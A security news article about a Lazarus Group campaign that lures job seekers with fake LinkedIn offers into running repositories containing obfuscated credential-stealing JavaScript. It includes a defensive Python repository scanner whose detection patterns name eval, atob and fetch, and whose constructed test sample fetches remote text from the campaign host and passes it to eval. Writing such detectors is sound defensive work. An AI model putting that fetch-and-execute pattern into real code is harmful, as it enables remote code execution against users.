The Lazarus Group, a cyber-syndicate linked to North Korea, has been observed orchestrating a nefarious operation that exploits fabricated LinkedIn job solicitations within the cryptocurrency and travel industries. The ultimate objective? Deploying insidious malware engineered to compromise Windows, macOS, and Linux environments alike.
As per intelligence from cybersecurity entity Bitdefender, the ruse commences with a seemingly innocuous outreach on a professional networking platform, luring unsuspecting professionals with enticing prospects of remote employment, flexible hours, and lucrative compensation.
While appearing routine, these solicitations serve a more insidious purpose—exfiltrating sensitive personal data and lending a façade of legitimacy to the engagement.
The Infiltration Blueprint
Upon securing the targeted information, the adversary, masquerading as a recruiter, furnishes the victim with a GitHub or Bitbucket repository link purportedly containing a prototype for a decentralized exchange (DEX). The victim is then instructed to review the code and provide feedback.
Embedded within the repository’s architecture is a cryptically obfuscated JavaScript payload, programmed to fetch a secondary-stage infection from api.npoint[.]io. This malicious script operates as a cross-platform credential pilferer, surgically extracting cryptocurrency wallet credentials from browser extensions.
Beyond its primary espionage role, the stealer functions as a malware loader, fetching a Python-based backdoor designed to monitor clipboard activities, sustain persistent remote access, and deploy supplementary malware modules.
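As an added, defender-side example (not code from the Bitdefender report or from this article), the following Python screens a cloned "assessment" repository before anyone runs it, looking for the traits described above: JavaScript that carries a long packed literal, decodes and executes it dynamically, and reaches out to a remote host, with the api.npoint[.]io host from the report treated as a decisive indicator. The function names, scoring weights and the constructed sample source are assumptions of this example.

```python
import base64
import math
import re
from collections import Counter
from pathlib import Path
KNOWN_STAGER_HOSTS = {"api.npoint.io"}  # second-stage host from the report (api.npoint[.]io)
# Calls that commonly appear when obfuscated JS decodes and runs a fetched payload.
SUSPICIOUS_CALLS = re.compile(r"\b(eval|Function|atob|unescape|child_process|fetch|XMLHttpRequest)\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
LONG_STRING_RE = re.compile(r"['\"]([^'\"\n]{200,})['\"]")  # packed / base64 literals

def shannon_entropy(s: str) -> float:
    """Bits per character; base64 or packed data usually scores above 5.0."""
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def scan_js_source(text: str) -> dict:
    """Score one JavaScript source for obfuscated-downloader traits (weights are assumed)."""
    hosts = set(URL_RE.findall(text))
    known = hosts & KNOWN_STAGER_HOSTS
    calls = sorted(set(SUSPICIOUS_CALLS.findall(text)))
    max_entropy = max((shannon_entropy(s) for s in LONG_STRING_RE.findall(text)), default=0.0)
    score = 0
    if known:                                   # decisive: known campaign infrastructure
        score += 10
    if max_entropy >= 5.0:                      # long high-entropy literal, likely a packed payload
        score += 3
    if "eval" in calls or "Function" in calls:  # dynamic code execution
        score += 3
    if hosts - KNOWN_STAGER_HOSTS:              # any other outbound URL deserves a look
        score += 1
    return {"hosts": sorted(hosts), "known_hosts": sorted(known), "calls": calls,
            "max_entropy": round(max_entropy, 2), "score": score}

def scan_repo(root: Path, threshold: int = 3) -> list:
    """Walk a cloned repository (skipping node_modules) and return findings at or above threshold."""
    findings = []
    for path in root.rglob("*.js"):
        if "node_modules" in path.parts:
            continue
        result = scan_js_source(path.read_text(errors="ignore"))
        if result["score"] >= threshold:
            findings.append(dict(result, path=str(path.relative_to(root))))
    return sorted(findings, key=lambda f: -f["score"])

# Constructed sample (not the real payload): a long base64 literal that is decoded and
# executed, plus a fetch to the host named in the report.
_BLOB = base64.b64encode(bytes(range(256))).decode()
SAMPLE_LURE_JS = (f'const k = "{_BLOB}";\nnew Function(atob(k))();\n'
                  'fetch("https://api.npoint.io/constructed-id").then(r => r.text()).then(eval);\n')
```

Run `scan_repo(Path("path/to/clone"))` on a freshly cloned repository; anything scoring at or above the threshold is worth reading by hand before the project is ever executed.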
Tactical Parallels to Contagious Interview
Bitdefender’s findings underscore striking resemblances to an already documented threat cluster denominated Contagious Interview (alternatively identified as DeceptiveDevelopment or DEV#POPPER). This campaign is notorious for disseminating the BeaverTail JavaScript infostealer alongside an auxiliary Python-based implant, InvisibleFerret.
At a later phase in the infection chain, the Python-delivered malware deploys a .NET-based payload—a binary capable of establishing a Tor proxy connection, exfiltrating system diagnostics, and dropping an additional keystroke logger, data exfiltration utility, and cryptocurrency miner.
“The adversary’s attack sequence is intricately layered, leveraging an arsenal of programming languages and an array of execution tactics,” Bitdefender elaborated.
Among the deployed methodologies:
- Multi-tiered Python scripts that recursively decode and execute malicious routines.
- A JavaScript stealer that initially scrapes browser-stored data before escalating to deeper payload injections.
- .NET-based stagers engineered to neutralize security defenses, configure Tor proxies, and propagate cryptojacking malware.
Campaign Proliferation and Persistence
The Lazarus Group’s stratagem appears to be disseminating widely, with anecdotal evidence surfacing on LinkedIn and Reddit detailing variations of the scheme. Some victims report being directed to clone a Web3 repository and execute it locally under the guise of a technical assessment, while others are asked to rectify deliberately embedded code anomalies.
A particular Bitbucket repository implicated in this campaign referenced a project designated “miketoken_v2”, though it has since been expunged from the hosting platform.
This revelation emerges merely one day following cybersecurity firm SentinelOne’s disclosure of an overlapping attack chain, wherein Contagious Interview is utilized to distribute an alternative strain of malware dubbed FlexibleFerret.